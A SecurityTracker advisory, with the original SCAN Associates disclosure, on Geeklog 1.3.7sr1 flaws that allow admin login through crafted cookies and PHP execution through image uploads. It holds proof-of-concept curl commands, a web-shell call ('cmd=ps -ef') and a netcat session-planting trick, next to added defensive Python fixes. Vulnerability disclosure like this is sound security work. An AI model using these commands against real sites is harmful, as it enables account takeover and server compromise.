SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  Geeklog
Vendors:  Geeklog
Geeklog Authentication Flaws Let Remote Users Gain 'Admin' Status and Execute Arbitrary PHP Code on the System
SecurityTracker Alert ID:  1006879
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 29 2003
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Advisory:  SCAN Associates
Version(s): 1.3.7sr1 and prior versions
Description:  Several vulnerabilities were reported in the Geeklog weblog. A remote user can gain administrator status on the application and can also execute arbitrary PHP code on the target server.

SCAN Associates reported that a remote user can gain access to the system as a regular user or as an administrative user.

It is reported that a remote user can specify a non-existent session ID to bypass an authentication check in the 'lib-sessions.php' script and cause the specified session ID to be entered into the state table.

A demonstration exploit command is provided [using the 'curl' tool]:

curl -b geeklog=9999 http://blablaba/users.php

It is also reported that a remote user can supply a floating point number as the value for the userid variable to login under any user identity, including an administrator.

A demonstration exploit command is provided:

curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

According to the report, the 'header.txt' contains valid session information for the admin user.
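To make the two cookie checks concrete from the defender's side, here is an added Python model of the flawed lib-sessions.php logic next to a hardened version. It is example code written for this page, not Geeklog's; the in-memory USERS table, the uid 2 admin row, the session list and the cookie names are constructed assumptions.

```python
import hmac
import re

# Constructed stand-in for the Geeklog 'users' table: uid -> stored password value.
# uid 2 is the admin account, as in the advisory's proof of concept.
USERS = {1: "hash-of-anonymous", 2: "hash-of-admin-secret"}
SESSIONS = []  # rows written to the (simulated) sessions table

def db_get_item_passwd(userid):
    """Model of DB_getItem($_TABLES['users'], 'passwd', "uid = $userid"):
    returns None when no row matches, which is what the check relies on."""
    try:
        wanted = float(userid)  # MySQL compares an int column with '2.1' as a double
    except ValueError:
        return None
    for uid, passwd in USERS.items():
        if uid == wanted:
            return passwd
    return None

def mysql_int_coerce(value):
    """MySQL silently stores '2.1' as 2 in an INTEGER column (the advisory's point)."""
    return int(float(value))

def vulnerable_login(cookies):
    """The original check: a missing password cookie and a non-existent user both
    yield None, so '$cookie_password <> $userpass' is false and login proceeds."""
    userid = cookies.get("geeklog")
    cookie_password = cookies.get("geeklog_password")
    userpass = db_get_item_passwd(userid)
    if cookie_password != userpass:
        return None
    SESSIONS.append({"uid": mysql_int_coerce(userid)})
    return SESSIONS[-1]["uid"]

def hardened_login(cookies):
    """Fix: accept only a canonical positive integer, require both the user row
    and the password cookie to exist, compare in constant time, and take the
    session uid from the database row rather than from the cookie."""
    userid = cookies.get("geeklog", "")
    cookie_password = cookies.get("geeklog_password")
    if not re.fullmatch(r"[1-9][0-9]*", userid) or not cookie_password:
        return None
    uid = int(userid)
    userpass = USERS.get(uid)
    if userpass is None or not hmac.compare_digest(cookie_password, userpass):
        return None
    SESSIONS.append({"uid": uid})
    return uid
```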

It is also reported that a remote user [presumably with privileges to upload images] can upload a valid image file with an arbitrary file extension. Because the user-supplied extension is kept, a remote user can embed PHP code in a valid image, upload it with a file extension associated with PHP, and then request the file to execute the embedded PHP code with the privileges of the web server.

A demonstration exploit method is described in the Source Message.
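An added example (not Geeklog's code) of the upload handling the third issue calls for: the stored extension is derived from the file's own signature and the basename is generated by the server, so a client-supplied '.php' name never reaches the filesystem. The signature table, the helper names and the sample bytes are this example's own.

```python
import os
import secrets

# Image signatures a weblog would accept, mapped to the only extension the
# server will ever write (constructed table for this example).
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def detect_image_extension(data):
    """Return the extension for the format the bytes actually carry, or None
    when no known signature is present. The client's MIME type (which the
    advisory notes Internet Explorer derives from the file header anyway)
    and the client's filename are deliberately not consulted."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None

def check_upload(user_filename, data):
    """Decide how an upload is stored. Returns None when the bytes are not a
    recognised image. Otherwise the stored name has a server-generated
    basename and a content-derived extension, so a valid image with PHP
    appended is saved as .png/.jpg/.gif and never handed to the interpreter.
    'extension_mismatch' flags requests whose own extension disagrees with
    the content, which is worth logging as a detection signal."""
    ext = detect_image_extension(data)
    if ext is None:
        return None
    client_ext = os.path.splitext(user_filename)[1].lower().lstrip(".")
    client_ext = {"jpeg": "jpg"}.get(client_ext, client_ext)
    return {
        "stored_name": "%s.%s" % (secrets.token_hex(8), ext),
        "extension_mismatch": client_ext != ext,
    }
```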

Impact:  A remote user can gain access to Geeklog acting as any user, including an administrative user.

A remote user with privileges to upload image files can execute arbitrary PHP code on the system with the privileges of the web server.

Solution:  The vendor has released a fixed version (1.3.7.sr2), available at:

http://www.geeklog.net/filemgmt/singlefile.php?lid=157

An upgrade archive (patch) is also available:

http://www.geeklog.net/filemgmt/singlefile.php?lid=158

Vendor URL:  www.geeklog.net/article.php?story=20030526093915939
Cause:  Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  pokleyzz <pokleyzz@scan-associates.net>
Message History:   None.


 Source Message Contents

Date:  Thu, 29 May 2003 13:02:55 +0800
From:  pokleyzz <pokleyzz@scan-associates.net>
Subject:  [VulnWatch] Geeklog 1.3.7sr1 and below multiple vulnerabilities.


Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net 
		shaharil_at_scan-associates.net 
		munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.

Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your 
own virtual community area, complete with user administration, story posting, 
messaging, comments, polls, calendar, weblinks, and more! It can run on many 
different operating systems, and uses PHP4 and MySQL.

Details
=======
i) SQL Integer manipulation in authentication script.

from lib-sessions.php line 128 ------------------------------------------------

       if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
           // Session cookie doesn't exist but a permanent cookie does.
           // Start a new session cookie;
           if ($_SESS_VERBOSE) {
               COM_errorLog('perm cookie found from lib-common.php',1);
           }

           $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
           $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

           //echo $userid;

           $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

           if ($cookie_password <> $userpass) {
               // User could have modified UID in cookie, don't do shit

           } else {
               if ($userid) {
                   $user_logged_in = 1;
                   //echo $userid;
                   // Create new session and write cookie
                   $sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                   SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_session'], $_CONF['cookie_path'], $_CONF['cookiedomain'], $_CONF['cookiesecure']);
                   $userdata = SESS_getUserDataFromId($userid);
                   $_USER = $userdata;
               }
           }
       }

------------------------------------------------------------------------

In this case:

DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

will execute "SELECT passwd from $_TABLES['users'] where uid=$userid". When we supply a non-existent user we can bypass the ($cookie_password <> $userpass) check, because $userpass and $cookie_password will both be null.

example:

curl -b geeklog=9999 http://blablaba/users.php

SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);

will execute the SQL query

"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')"

A valid session for user 9999, which does not exist, will be inserted into the database.

Integer manipulation to get admin access
----------------------------------------
By supplying a floating point number as userid, a user can easily log in as any Geeklog user. This is because userid is an integer value in the database and a floating point number always gives a null value for $userpass (non-existent user). 2.1 will be inserted as 2 in a column with integer data type.

proof of concept:

curl -b geeklog=2.1 -D header.txt http://blablaba/users.php

header.txt will contain a valid session for admin.

ii) Upload image with any extension.

There is a lack of error checking in the upload image scripts, where a user can upload a valid image with any extension (users and stories modules). The user-supplied extension will be used as the image's extension. By embedding PHP code in an image, a user can execute any command as the apache user on the remote server.

proof of concept:

i) Upload the attached file to the server using "Internet Explorer". "Internet Explorer" will use the file header to generate the mime-type for the uploaded file.
ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php

Vendor Response
===============
Vendor has been contacted on 19/05/2003 and a fixed version is available at http://www.geeklog.net

Tips
====
Simple way to trick mozilla into storing a session from any site.

i) Edit header.txt.

----------------header.txt -------------------------
HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT; path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
----------------header.txt --------------------------

ii) Using netcat:

# nc -l -p 9090 < header.txt

iii) Set your mozilla http proxy server to 127.0.0.1:9090
iv) Browse to http://blablaba.com/
v) Unset the proxy and browse to http://blablabla.com



Copyright 2002, SecurityGlobal.net LLC